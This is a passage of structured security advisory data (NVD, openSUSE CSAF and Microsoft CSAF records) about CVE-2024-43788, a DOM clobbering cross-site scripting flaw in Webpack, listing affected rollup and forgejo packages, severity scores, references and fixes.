aparentemente benignas y sin script en la p\u00e1gina web (por ejemplo, a trav\u00e9s de una publicaci\u00f3n o comentario) y aprovecha los gadgets (fragmentos de c\u00f3digo js) que se encuentran en el c\u00f3digo javascript existente para transformarlo en c\u00f3digo ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificaci\u00f3n desinfectados incorrectamente. Este problema se solucion\u00f3 en la versi\u00f3n 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema."
}
],
"id": "CVE-2024-43788",
"lastModified": "2024-09-03T15:15:15.937",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-08-27T17:15:07.967",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Technical Description",
"Third Party Advisory"
],
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
OPENSUSE-SU-2025:15020-1
Vulnerability from csaf_opensuse - Published: 2025-04-23 00:00 - Updated: 2025-04-23 00:00Summary
rollup-3.29.5-1.1 on GA media
Notes
Title of the patch
rollup-3.29.5-1.1 on GA media
Description of the patch
These are all security issues fixed in the rollup-3.29.5-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15020
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "rollup-3.29.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the rollup-3.29.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15020",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15020-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-43788 page",
"url": "https://www.suse.com/security/cve/CVE-2024-43788/"
}
],
"title": "rollup-3.29.5-1.1 on GA media",
"tracking": {
"current_release_date": "2025-04-23T00:00:00Z",
"generator": {
"date": "2025-04-23T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15020-1",
"initial_release_date": "2025-04-23T00:00:00Z",
"revision_history": [
{
"date": "2025-04-23T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "rollup-3.29.5-1.1.aarch64",
"product": {
"name": "rollup-3.29.5-1.1.aarch64",
"product_id": "rollup-3.29.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "rollup-3.29.5-1.1.ppc64le",
"product": {
"name": "rollup-3.29.5-1.1.ppc64le",
"product_id": "rollup-3.29.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "rollup-3.29.5-1.1.s390x",
"product": {
"name": "rollup-3.29.5-1.1.s390x",
"product_id": "rollup-3.29.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "rollup-3.29.5-1.1.x86_64",
"product": {
"name": "rollup-3.29.5-1.1.x86_64",
"product_id": "rollup-3.29.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "rollup-3.29.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:rollup-3.29.5-1.1.aarch64"
},
"product_reference": "rollup-3.29.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rollup-3.29.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:rollup-3.29.5-1.1.ppc64le"
},
"product_reference": "rollup-3.29.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rollup-3.29.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:rollup-3.29.5-1.1.s390x"
},
"product_reference": "rollup-3.29.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rollup-3.29.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:rollup-3.29.5-1.1.x86_64"
},
"product_reference": "rollup-3.29.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-43788"
}
],
"notes": [
{
"category": "general",
"text": "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u0027s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:rollup-3.29.5-1.1.aarch64",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.ppc64le",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.s390x",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-43788",
"url": "https://www.suse.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "SUSE Bug 1229860 for CVE-2024-43788",
"url": "https://bugzilla.suse.com/1229860"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:rollup-3.29.5-1.1.aarch64",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.ppc64le",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.s390x",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:rollup-3.29.5-1.1.aarch64",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.ppc64le",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.s390x",
"openSUSE Tumbleweed:rollup-3.29.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-23T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-43788"
}
]
}
OPENSUSE-SU-2024:14330-1
Vulnerability from csaf_opensuse - Published: 2024-09-10 00:00 - Updated: 2024-09-10 00:00Summary
forgejo-8.0.3-1.1 on GA media
Notes
Title of the patch
forgejo-8.0.3-1.1 on GA media
Description of the patch
These are all security issues fixed in the forgejo-8.0.3-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-14330
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "forgejo-8.0.3-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the forgejo-8.0.3-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-14330",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14330-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-43788 page",
"url": "https://www.suse.com/security/cve/CVE-2024-43788/"
}
],
"title": "forgejo-8.0.3-1.1 on GA media",
"tracking": {
"current_release_date": "2024-09-10T00:00:00Z",
"generator": {
"date": "2024-09-10T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:14330-1",
"initial_release_date": "2024-09-10T00:00:00Z",
"revision_history": [
{
"date": "2024-09-10T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "forgejo-8.0.3-1.1.aarch64",
"product": {
"name": "forgejo-8.0.3-1.1.aarch64",
"product_id": "forgejo-8.0.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "forgejo-apparmor-8.0.3-1.1.aarch64",
"product": {
"name": "forgejo-apparmor-8.0.3-1.1.aarch64",
"product_id": "forgejo-apparmor-8.0.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "forgejo-firewalld-8.0.3-1.1.aarch64",
"product": {
"name": "forgejo-firewalld-8.0.3-1.1.aarch64",
"product_id": "forgejo-firewalld-8.0.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "forgejo-selinux-8.0.3-1.1.aarch64",
"product": {
"name": "forgejo-selinux-8.0.3-1.1.aarch64",
"product_id": "forgejo-selinux-8.0.3-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "forgejo-8.0.3-1.1.ppc64le",
"product": {
"name": "forgejo-8.0.3-1.1.ppc64le",
"product_id": "forgejo-8.0.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "forgejo-apparmor-8.0.3-1.1.ppc64le",
"product": {
"name": "forgejo-apparmor-8.0.3-1.1.ppc64le",
"product_id": "forgejo-apparmor-8.0.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "forgejo-firewalld-8.0.3-1.1.ppc64le",
"product": {
"name": "forgejo-firewalld-8.0.3-1.1.ppc64le",
"product_id": "forgejo-firewalld-8.0.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "forgejo-selinux-8.0.3-1.1.ppc64le",
"product": {
"name": "forgejo-selinux-8.0.3-1.1.ppc64le",
"product_id": "forgejo-selinux-8.0.3-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "forgejo-8.0.3-1.1.s390x",
"product": {
"name": "forgejo-8.0.3-1.1.s390x",
"product_id": "forgejo-8.0.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "forgejo-apparmor-8.0.3-1.1.s390x",
"product": {
"name": "forgejo-apparmor-8.0.3-1.1.s390x",
"product_id": "forgejo-apparmor-8.0.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "forgejo-firewalld-8.0.3-1.1.s390x",
"product": {
"name": "forgejo-firewalld-8.0.3-1.1.s390x",
"product_id": "forgejo-firewalld-8.0.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "forgejo-selinux-8.0.3-1.1.s390x",
"product": {
"name": "forgejo-selinux-8.0.3-1.1.s390x",
"product_id": "forgejo-selinux-8.0.3-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "forgejo-8.0.3-1.1.x86_64",
"product": {
"name": "forgejo-8.0.3-1.1.x86_64",
"product_id": "forgejo-8.0.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "forgejo-apparmor-8.0.3-1.1.x86_64",
"product": {
"name": "forgejo-apparmor-8.0.3-1.1.x86_64",
"product_id": "forgejo-apparmor-8.0.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "forgejo-firewalld-8.0.3-1.1.x86_64",
"product": {
"name": "forgejo-firewalld-8.0.3-1.1.x86_64",
"product_id": "forgejo-firewalld-8.0.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "forgejo-selinux-8.0.3-1.1.x86_64",
"product": {
"name": "forgejo-selinux-8.0.3-1.1.x86_64",
"product_id": "forgejo-selinux-8.0.3-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64"
},
"product_reference": "forgejo-8.0.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le"
},
"product_reference": "forgejo-8.0.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-8.0.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x"
},
"product_reference": "forgejo-8.0.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64"
},
"product_reference": "forgejo-8.0.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-apparmor-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64"
},
"product_reference": "forgejo-apparmor-8.0.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-apparmor-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le"
},
"product_reference": "forgejo-apparmor-8.0.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-apparmor-8.0.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x"
},
"product_reference": "forgejo-apparmor-8.0.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-apparmor-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64"
},
"product_reference": "forgejo-apparmor-8.0.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-firewalld-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64"
},
"product_reference": "forgejo-firewalld-8.0.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-firewalld-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le"
},
"product_reference": "forgejo-firewalld-8.0.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-firewalld-8.0.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x"
},
"product_reference": "forgejo-firewalld-8.0.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-firewalld-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64"
},
"product_reference": "forgejo-firewalld-8.0.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-selinux-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64"
},
"product_reference": "forgejo-selinux-8.0.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-selinux-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le"
},
"product_reference": "forgejo-selinux-8.0.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-selinux-8.0.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x"
},
"product_reference": "forgejo-selinux-8.0.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "forgejo-selinux-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64"
},
"product_reference": "forgejo-selinux-8.0.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-43788"
}
],
"notes": [
{
"category": "general",
"text": "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u0027s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-43788",
"url": "https://www.suse.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "SUSE Bug 1229860 for CVE-2024-43788",
"url": "https://bugzilla.suse.com/1229860"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x",
"openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-09-10T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-43788"
}
]
}
MSRC_CVE-2024-43788
Vulnerability from csaf_microsoft - Published: 2024-08-02 00:00 - Updated: 2024-10-15 00:00Summary
DOM Clobbering Gadget found in Webpack's AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
